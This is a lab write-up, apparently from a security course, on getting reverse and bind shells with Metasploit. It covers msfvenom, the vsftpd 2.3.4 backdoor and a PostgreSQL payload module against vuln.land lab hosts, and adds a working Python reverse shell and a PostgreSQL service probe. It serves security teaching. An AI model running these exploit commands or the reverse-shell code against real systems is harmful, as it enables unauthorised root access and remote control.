Write-up on the Metasploit Reverse Shell
Metasploit Reverse Shell on localhost
A reverse shell is to be created on Kali, so attacker and victim are both localhost.
We use Metasploit for this. msfvenom is part of the Metasploit Framework and is its payload generator and encoder. The documentation can be found at offensive-security.
You get a list of all available payloads with:
msfvenom -l payloads
In the exercise we use the payload linux/x86/meterpreter/reverse_tcp, which creates a reverse shell that connects back to the attacker.
How does a reverse shell work? Who opens the TCP connection and to which IP / port?
The attacker is the server: it listens on port 8080 on its own IP (LHOST/LPORT in the payload). The victim is the client: the payload running on the victim opens the TCP connection to the attacker's IP and port 8080. With ssh it is the other way around: the ssh server listens on port 22, the client opens the connection, and the server starts the shell once the client has connected and authenticated.
Who opens the shell? Who controls it? Which computer executes the commands entered?
The victim opens the shell and the attacker controls it. The shell process runs on the victim, so the commands typed on the attacker side are executed on the victim, with the privileges of the process that ran the payload. The attacker only sends input and receives output over the TCP connection.
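To make the two answers above concrete, here is an added example (not part of the original write-up and not Metasploit code) that re-implements the reverse-shell mechanics in plain Python on localhost: the attacker side binds and waits like multi/handler does, the victim side opens the TCP connection outward and executes whatever it receives, like the reverse_tcp payload does. The attacker address, the end-of-output marker and the demo commands are assumptions chosen for the example.

```python
"""Minimal reverse shell on localhost: attacker listener + victim connector.

Added example, not from the original write-up and not Metasploit's own code.
It shows at the TCP level what multi/handler (attacker) and the
linux/x86/meterpreter/reverse_tcp payload (victim) do: the VICTIM opens the
connection, the ATTACKER only accepts it, and commands execute on the victim.
"""
import socket
import subprocess
import threading

ATTACKER_HOST = "127.0.0.1"  # assumption: attacker and victim are both localhost
END = b"\n__END__\n"         # assumption: simple end-of-output marker for the demo


def attacker_listener(port):
    """Attacker side (multi/handler role): bind and wait for the victim to call back.

    Port 0 lets the OS pick a free port; the caller reads it from the socket.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((ATTACKER_HOST, port))
    srv.listen(1)
    srv.settimeout(5)  # fail loudly instead of hanging if nothing connects
    return srv


def victim_reverse_shell(host, port):
    """Victim side (payload role): *it* opens the TCP connection to the attacker.

    Reads newline-terminated commands, runs them locally and sends the output
    back. Stops when the attacker sends 'exit' or closes the connection.
    """
    s = socket.create_connection((host, port))
    with s, s.makefile("rb") as rx:
        for line in rx:
            cmd = line.decode(errors="replace").strip()
            if cmd == "exit":
                break
            # The command runs HERE, on the victim, with the victim's privileges;
            # the attacker never executes anything, it only sees the output.
            res = subprocess.run(cmd, shell=True, capture_output=True)
            s.sendall(res.stdout + res.stderr + END)


def attacker_run(conn, cmd):
    """Attacker side: send one command line and collect the victim's output."""
    conn.sendall(cmd.encode() + b"\n")
    buf = b""
    while not buf.endswith(END):
        chunk = conn.recv(4096)
        if not chunk:  # victim went away
            break
        buf += chunk
    if buf.endswith(END):
        buf = buf[: -len(END)]
    return buf.decode(errors="replace")


def demo(commands=("echo reverse-shell-ok", "id")):
    """Wire both halves together on localhost; return {command: output}."""
    srv = attacker_listener(0)
    port = srv.getsockname()[1]
    victim = threading.Thread(
        target=victim_reverse_shell, args=(ATTACKER_HOST, port), daemon=True
    )
    victim.start()            # victim connects out to attacker:port ...
    conn, _peer = srv.accept()  # ... and the attacker merely accepts the call-back
    results = {}
    with conn:
        for c in commands:
            results[c] = attacker_run(conn, c)
        conn.sendall(b"exit\n")
    srv.close()
    victim.join(timeout=5)
    return results


if __name__ == "__main__":
    for cmd, out in demo().items():
        print("$ " + cmd)
        print(out, end="")
```

Run it and swap the two functions onto two different machines to see the direction: only the victim needs to be able to reach the attacker, which is why reverse shells get through egress-only firewalls where a bind shell (which would need the attacker to reach the victim) does not.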
Reverse Shell via vsftpd Exploit
Metasploit is supposed to be used to exploit a vulnerability.
First, I scan for open ports and find the associated services. Then I try to find a vulnerability for a service, which can then be used to create a shell.
The first part can be done with nmap.
nmap -v --script vuln iloveshells.vm.vuln.land
Among the results are several MitM-related findings, but also a vulnerability reported by the ftp-vsftpd-backdoor script.
We exploit it as follows (the search shows the matching module, which is then selected with use):
msfconsole
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
show options
set RHOSTS iloveshells.vm.vuln.land
run
After run we already have a shell on the victim, running as root. Note that, despite the heading, this particular exploit yields a bind shell: the backdoor opens a listener on port 6200 on the victim and Metasploit connects to it, so the connection direction is the opposite of the reverse shell in the first exercise.
Reverse Shell via Postgresql Exploit
We are supposed to get access to a system that was not meant to be online.
nmap -sV 1b215cfe-44e6-4d1d-952c-3aa55d2b63e1.rdocker.vuln.land
msfconsole
use exploit/linux/postgres/postgres_payload
set RHOSTS 1b215cfe-44e6-4d1d-952c-3aa55d2b63e1.rdocker.vuln.land
set RPORT 8181
run
RPORT has to be set explicitly because PostgreSQL is not running on its default port 5432 here; the -sV service detection is what revealed it on 8181.
You now have a shell and can do what you need to do.
Good to know
- Nessus does not find everything
- Tools rely on conventions like port 5432 for PostgreSQL
- If something is not on its default port, you have to collect the information yourself -> nmap port scan plus service detection (-sV)
- The nmap script scan nmap -v --script vuln did not detect port 8181 as PostgreSQL. vuln is a script category, not a specific script; NSE scripts decide whether to run from the port number or from the service name, and without -sV the service on 8181 stays unknown, so the PostgreSQL scripts skip it. It is better to choose the right script, add -sV, and specify the port with -p.
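The last two points are about detection that ignores port conventions. The following added example (not from the original write-up and not nmap's code) does what nmap's -sV version detection does for PostgreSQL: it sends a genuine protocol 3.0 StartupMessage to whatever port it is given and recognises the backend's reply, an 'R' AuthenticationRequest or an 'E' ErrorResponse, so a server on 8181 is identified just as well as one on 5432. The user and database names in the startup packet, and the two tiny servers used for the demo (one answering like a PostgreSQL backend, one answering like a web server), are constructed assumptions for the example.

```python
"""PostgreSQL service probe that does not depend on the port number.

Added example, not from the original write-up and not nmap's own code. It does
by hand what nmap -sV does for PostgreSQL: speak the protocol and classify the
reply. The fake servers below are constructed stand-ins so it runs offline.
"""
import socket
import struct
import threading

PG_PROTOCOL_3_0 = 196608  # major 3, minor 0, packed as one Int32
AUTH_TYPES = {0: "AuthenticationOk", 3: "cleartext password",
              5: "MD5 password", 10: "SASL"}


def pg_startup_message(user="probe", database="postgres"):
    """Build a StartupMessage: Int32 length, Int32 version, key\\0value\\0 pairs, \\0.

    user/database are assumed values; the server answers regardless of them.
    """
    body = struct.pack("!I", PG_PROTOCOL_3_0)
    body += b"user\0" + user.encode() + b"\0"
    body += b"database\0" + database.encode() + b"\0"
    body += b"\0"
    return struct.pack("!I", len(body) + 4) + body


def parse_pg_reply(data):
    """Return a description if data is a PostgreSQL backend message, else None."""
    if len(data) < 5:
        return None
    kind = data[0:1]
    (length,) = struct.unpack("!I", data[1:5])  # counts itself, not the kind byte
    if length < 4:
        return None
    if kind == b"R" and length >= 8 and len(data) >= 9:
        (auth,) = struct.unpack("!I", data[5:9])
        return "postgresql: authentication request (%s)" % AUTH_TYPES.get(auth, auth)
    if kind == b"E":
        # ErrorResponse: sequence of <field code byte><string>\0, ended by a \0
        fields, pos = {}, 5
        while pos < len(data) and data[pos] != 0:
            end = data.find(b"\0", pos + 1)
            if end < 0:
                break
            fields[chr(data[pos])] = data[pos + 1:end].decode("utf-8", "replace")
            pos = end + 1
        return "postgresql: error %s %s" % (fields.get("C", "?"), fields.get("M", ""))
    return None  # anything else (HTTP banner, silence, ...) is not PostgreSQL


def probe_postgres(host, port, timeout=3.0):
    """Talk PostgreSQL to host:port; the port number plays no role in the verdict."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(pg_startup_message())
            data = s.recv(4096)
    except OSError:
        return None
    return parse_pg_reply(data)


def _serve_once(handler):
    """Constructed helper: one-shot TCP server on an ephemeral localhost port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    srv.settimeout(5)

    def run():
        conn, _ = srv.accept()
        with conn:
            handler(conn)
        srv.close()

    threading.Thread(target=run, daemon=True).start()
    return srv.getsockname()[1]


def fake_postgres(conn):
    """Constructed stand-in for a PostgreSQL backend on a non-standard port."""
    req = conn.recv(4096)
    if req[4:8] != struct.pack("!I", PG_PROTOCOL_3_0):
        return
    body = b"SFATAL\0C28000\0Mno pg_hba.conf entry for host \"127.0.0.1\"\0\0"
    conn.sendall(b"E" + struct.pack("!I", len(body) + 4) + body)


def fake_web(conn):
    """Constructed stand-in for an unrelated service that rejects our packet."""
    conn.recv(4096)
    conn.sendall(b"HTTP/1.0 400 Bad Request\r\n\r\n")


def demo():
    """Probe one PostgreSQL-speaking port and one web port; return both verdicts."""
    pg_port = _serve_once(fake_postgres)
    web_port = _serve_once(fake_web)
    return {"postgres": probe_postgres("127.0.0.1", pg_port),
            "other": probe_postgres("127.0.0.1", web_port)}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(name, "->", verdict)
```

The nmap equivalent for the exercise host is nmap -sV -p 8181 <host>: once -sV has labelled the port as postgresql, the pgsql NSE scripts match on the service name and run, even though 8181 is not their conventional port.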